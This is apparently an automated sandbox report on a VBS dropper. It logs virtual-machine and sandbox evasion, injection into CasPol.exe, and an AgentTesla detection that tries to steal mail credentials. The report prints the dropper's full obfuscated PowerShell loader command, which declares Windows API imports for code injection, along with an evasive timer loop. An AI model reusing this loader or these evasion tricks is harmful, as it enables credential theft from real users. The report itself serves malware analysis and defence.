Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Potential evasive VBS script found (use of timer() function in loop)

Source: Initial file

Initial file: do while timer-temp<sec

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2344	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860	Thread sleep count: 382 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860	Thread sleep time: -11460000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8949			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: threadDelayed 382			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep			graph_17-42086
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_17-42088

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: ModuleInformation

Jump to behavior

Source: wscript.exe, 00000000.00000002.259228881.0000012BBB50F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Code function: 17_2_20105110 LdrInitializeThunk,

17_2_20105110

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skoleeksempel = """smadrdzodsy-cotblysapceech lo-untoryhapudefodmaesyfcaimhnnaiphtprifoopenpe uf'teuresblihensmgge tasskyopsqutueeanmbo;baudosfrialnorgje kasfjymissptvmedrmra.corbautunvatwaipamsaetr.viimanuntgieomrbaohuphysgoeimrapvtriomccleovsna;popafuchbkulduimocdo dasletanabutlyipocjo arcfelunaamshesno disudtnouspeinoburscgrelaseelrovsax1re ti{pr[sudwhlfolfeirimunpazosurpatst(en`"""aswopimaninsaspcaonoofolsg.redngrekvre`"""po)ho]frptruembselzeichcdj biskatglaprtimigeche paeobxfotreemirbrnca liiacnsutel enpderefifonbatmaefirafmscecostesadadigheemibpeoapxva(meisunretba skshytopahebrrlst,asibunbatsc sydsneadldeaungoptfo,pribinbitro skcunrpuobl,laitunhytla norfribevreuvalun,raironcatet eptmarfrobapkeiefcba,seirunmotll cosvakseibotfosreecr)bi;cy[rtdmulbalatilimlapfeorerimtin(ra`"""klaundeuvleaacpbaiaf3fr2pa.codanlhallg`"""tu)sp]repgrujubmulstioscoc masfatreauntraistckn reeprxpitdeeberennsi anigansgtaa snrinebrgerqgoubaeolrfrytridenclfchoenkwietryst(maistnfltmi nopspodutadtteehynsu,priprnsatfr ortskesolunereoarlde,akiinnbetfo coprelsaumerun,leiunnlatfl dyfsyufisefiimostnat,ouiioncuthe aasbeaillwa,baiponantrk kosgiaunuun,nyiginsrtbo stkloasnlreken,griarnmetdi hywtaetaeaf,odiemnfltir nugabohedgikko,siitonbrtim mesovymonhaabinro,veirenaatca brpagebyasj,vaihanphtgo nibbrinorgakpl)sa;su[andrelralmoisemhopyoopersntvi(re`"""dikwievorprnkoesmlqu3gl2os`"""un)sl]bopinugabkalamiflcfu rnsfetstaprtasicecov brezoxswtstereramnop stihancytph tedraudrprelsoihocknamutanemuhiraamnfodmilleesi(roispnbatop sphmijgaeun,unigunquttr crmloeakeavtesibenfl,reimonamtur hougonunounrsj,dyirantitfl kaemoxbeagecpr,ddiphnekttu baomavpiebrrbi,diitinmitrc udbfaidyooumsyepecdi,miibunxitop onsmiihulpausk)pr;kr[thdbalaflbaiinmfopdeororoptun(rh`"""mokfoesprprnexeamlad3he2op`"""ld)un]fepabufebskldeiincsn afsnetkeaeqtsaisucst saegrxdataneirrrenam neipenditdo fovfeiworbltceuopafllanainlbiluaosucel(moisunfatno prvde1ba,fditrnuntfo fival2tr,weispnsttka covfo3fo,osiganwitre savbe4ca)vi;ou[kadpalkrlfiianmscpvioxyrtitme(ax`"""maumeswietarek3di2kr`"""fa)ne]capleuwobmalydiincan bosextgrafrtciicocet opevaxentzuegnrkande alitinmaton usgfeenetvepovrklothpal(coifinfatbr uredegenyto,naitinbatls lesbehneati)as;ma[sidpllnelduicamvapsgoshrwatty(te`"""unujosdeecarco3sy2gu`"""fi)ur]skpstuanbhylheilycag smsmitsuatitodivacli boerwxtrtskeverunnno hyimonliteu blcthrovebraintfletjctiuopratstroiorpr(foidentitef glmiseunlunlfy,geitansotma korekrhalim,buisknertaw sufrilpoytagso,stiimnlatko acfbeaimsintsplbe,piiadnbrtpr crbreaagabenst1fo1pu1ha,hyistntytun stphasfoedaudi,shiennedtbg noqcouacaprkpieidrst)te;is[stdstlsulymichmmapafoudrpotta(bo`"""amadodbuvspaufpzoico3ba2bi`"""sh)va]sapunuaabgelhaibecun arssutjuaokthaioncpe coeprxictsretertinbi toilannutpo lysduehytarssbecorhivbiichcpresabmaifjtwesfr(snislnsater afgunaberre,nsipentytli hutudekonahogrndi,moitanfltte jodzoesesbapkr,maitrnsutsa gyeevxudpkl
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skoleeksempel = """smadrdzodsy-cotblysapceech lo-untoryhapudefodmaesyfcaimhnnaiphtprifoopenpe uf'teuresblihensmgge tasskyopsqutueeanmbo;baudosfrialnorgje kasfjymissptvmedrmra.corbautunvatwaipamsaetr.viimanuntgieomrbaohuphysgoeimrapvtriomccleovsna;popafuchbkulduimocdo dasletanabutlyipocjo arcfelunaamshesno disudtnouspeinoburscgrelaseelrovsax1re ti{pr[sudwhlfolfeirimunpazosurpatst(en`"""aswopimaninsaspcaonoofolsg.redngrekvre`"""po)ho]frptruembselzeichcdj biskatglaprtimigeche paeobxfotreemirbrnca liiacnsutel enpderefifonbatmaefirafmscecostesadadigheemibpeoapxva(meisunretba skshytopahebrrlst,asibunbatsc sydsneadldeaungoptfo,pribinbitro skcunrpuobl,laitunhytla norfribevreuvalun,raironcatet eptmarfrobapkeiefcba,seirunmotll cosvakseibotfosreecr)bi;cy[rtdmulbalatilimlapfeorerimtin(ra`"""klaundeuvleaacpbaiaf3fr2pa.codanlhallg`"""tu)sp]repgrujubmulstioscoc masfatreauntraistckn reeprxpitdeeberennsi anigansgtaa snrinebrgerqgoubaeolrfrytridenclfchoenkwietryst(maistnfltmi nopspodutadtteehynsu,priprnsatfr ortskesolunereoarlde,akiinnbetfo coprelsaumerun,leiunnlatfl dyfsyufisefiimostnat,ouiioncuthe aasbeaillwa,baiponantrk kosgiaunuun,nyiginsrtbo stkloasnlreken,griarnmetdi hywtaetaeaf,odiemnfltir nugabohedgikko,siitonbrtim mesovymonhaabinro,veirenaatca brpagebyasj,vaihanphtgo nibbrinorgakpl)sa;su[andrelralmoisemhopyoopersntvi(re`"""dikwievorprnkoesmlqu3gl2os`"""un)sl]bopinugabkalamiflcfu rnsfetstaprtasicecov brezoxswtstereramnop stihancytph tedraudrprelsoihocknamutanemuhiraamnfodmilleesi(roispnbatop sphmijgaeun,unigunquttr crmloeakeavtesibenfl,reimonamtur hougonunounrsj,dyirantitfl kaemoxbeagecpr,ddiphnekttu baomavpiebrrbi,diitinmitrc udbfaidyooumsyepecdi,miibunxitop onsmiihulpausk)pr;kr[thdbalaflbaiinmfopdeororoptun(rh`"""mokfoesprprnexeamlad3he2op`"""ld)un]fepabufebskldeiincsn afsnetkeaeqtsaisucst saegrxdataneirrrenam neipenditdo fovfeiworbltceuopafllanainlbiluaosucel(moisunfatno prvde1ba,fditrnuntfo fival2tr,weispnsttka covfo3fo,osiganwitre savbe4ca)vi;ou[kadpalkrlfiianmscpvioxyrtitme(ax`"""maumeswietarek3di2kr`"""fa)ne]capleuwobmalydiincan bosextgrafrtciicocet opevaxentzuegnrkande alitinmaton usgfeenetvepovrklothpal(coifinfatbr uredegenyto,naitinbatls lesbehneati)as;ma[sidpllnelduicamvapsgoshrwatty(te`"""unujosdeecarco3sy2gu`"""fi)ur]skpstuanbhylheilycag smsmitsuatitodivacli boerwxtrtskeverunnno hyimonliteu blcthrovebraintfletjctiuopratstroiorpr(foidentitef glmiseunlunlfy,geitansotma korekrhalim,buisknertaw sufrilpoytagso,stiimnlatko acfbeaimsintsplbe,piiadnbrtpr crbreaagabenst1fo1pu1ha,hyistntytun stphasfoedaudi,shiennedtbg noqcouacaprkpieidrst)te;is[stdstlsulymichmmapafoudrpotta(bo`"""amadodbuvspaufpzoico3ba2bi`"""sh)va]sapunuaabgelhaibecun arssutjuaokthaioncpe coeprxictsretertinbi toilannutpo lysduehytarssbecorhivbiichcpresabmaifjtwesfr(snislnsater afgunaberre,nsipentytli hutudekonahogrndi,moitanfltte jodzoesesbapkr,maitrnsutsa gyeevxudpkl			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match

File source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

